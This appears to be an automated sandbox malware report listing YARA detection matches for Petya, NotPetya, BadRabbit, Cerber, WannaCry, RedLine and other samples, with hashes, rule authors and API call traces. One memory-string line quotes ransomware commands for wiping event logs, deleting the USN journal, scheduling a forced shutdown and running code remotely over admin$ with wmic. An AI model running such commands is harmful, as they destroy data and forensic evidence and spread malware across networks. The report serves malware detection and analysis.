        Source: 47.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: 47.2.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 13.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Cerber3 Author: pekeinfo
        Source: 0000002F.00000000.350343417.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 0000000D.00000000.307768688.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: 0000000D.00000002.360524596.0000000001510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 0000000D.00000002.355663815.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 0000000D.00000000.308250321.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000000D.00000000.306858920.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000000D.00000002.367850533.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber Payload Author: kevoreilly
        Source: 0000002F.00000000.347435865.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 0000002F.00000000.349191246.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 0000000D.00000000.305189776.0000000000448000.00000020.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Cerber3 Author: pekeinfo
        Source: 0000002F.00000002.534820405.000000000041A000.00000080.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: 0000002F.00000000.351223575.0000000000401000.00000020.00000001.01000000.00000015.sdmp, type: MEMORYMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: Process Memory Space: rundll32.exe PID: 5496, type: MEMORYSTRMatched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
        Source: C:\Users\user\AppData\Local\Temp\5hado0b0.phn\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: Cerber3 Author: pekeinfo
        Source: C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: Detects InfinityLock ransomware Author: ditekSHen
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: Bad Rabbit Ransomware Author: Christiaan Beek
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: Detect DiskCryptor open encryption solution that offers encryption of all disk partitions Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: Detects BadRabbit Ransomware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Detects Petya Ransomware Author: Florian Roth
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015 Author: CCN-CERT
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
        Source: C:\Users\user\AppData\Local\Temp\nuxubd5j.5lo\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
        Source: Endermanch@PolyRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: Endermanch@ViraLock.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Local\Temp\yngyag0a.2kg\Endermanch@Petya.A.exeHard error raised: shutdown
        Source: rundll32.exe, 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D38409_2_000D3840
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D201D9_2_000D201D
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D30E39_2_000D30E3
        Source: C:\Users\user\AppData\Local\Temp\vizhwbnh.yaz\Endermanch@BadRabbit.exeCode function: 9_2_000D173C9_2_000D173C
        Source: C:\Users\user\AppData\Local\Temp\rje43etl.wlj\Endermanch@Birele.exeCode function: 11_2_00415E7C11_2_00415E7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477A83C12_2_0477A83C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477C94012_2_0477C940
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477B11D12_2_0477B11D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477270812_2_04772708
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0477C1E312_2_0477C1E3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,12_2_04779B63
        Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\0bcmbqtt.m3v\Fantom.exeSection loaded: mscorjit.dll
        Source: C:\Users\user\AppData\Local\Temp\ddft42qg.xs4\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04779534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,12_2_04779534
        Source: 1jDe7zWnoe.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: 13.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 12.3.rundll32.exe.3073250.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 31.0.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 31.0.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 21.0.Fantom.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 13.2.Endermanch@Cerber5.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 47.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 47.0.Endermanch@Petya.A.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 13.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 36.0.dispci.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 36.0.dispci.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 13.2.Endermanch@Cerber5.exe.1510000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 12.2.rundll32.exe.3073250.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 12.2.rundll32.exe.4770000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.rundll32.exe.4770000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 47.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 47.0.Endermanch@Petya.A.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 21.2.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 31.0.EF39.tmp.7ff64e9a0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 31.0.EF39.tmp.7ff64e9a0000.2.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 12.2.rundll32.exe.2ff54d0.0.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.rundll32.exe.2ff54d0.0.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.Fantom.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.3.rundll32.exe.3073250.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.rundll32.exe.3073250.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 31.2.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 31.2.EF39.tmp.7ff64e9a0000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 29.0.Endermanch@InfinityCrypt.exe.8031cc.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: 21.0.Fantom.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 12.3.rundll32.exe.3073250.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 12.3.rundll32.exe.3073250.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 47.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 47.0.Endermanch@Petya.A.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 47.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
        Source: 47.0.Endermanch@Petya.A.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
        Source: 29.0.Endermanch@InfinityCrypt.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
        Source: 13.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 31.0.EF39.tmp.7ff64e9a0000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 31.0.EF39.tmp.7ff64e9a0000.1.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
        Source: 12.3.rundll32.exe.3073250.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 12.2.rundll32.exe.2ff54d0.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.rundll32.exe.2ff54d0.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 13.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
        Source: 9.0.Endermanch@BadRabbit.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 21.0.Fantom.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 47.2.Endermanch@Petya.A.exe.5f0000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya tc_detection_name = Petya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: 13.2.Endermanch@Cerber5.exe.4e50000.2.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
        Source: 9.2.Endermanch@BadRabbit.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 47.2.Endermanch@Petya.A.exe.41b363.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Petya tc_detection_name = Petya, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
        Source: 12.3.rundll32.exe.3073250.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
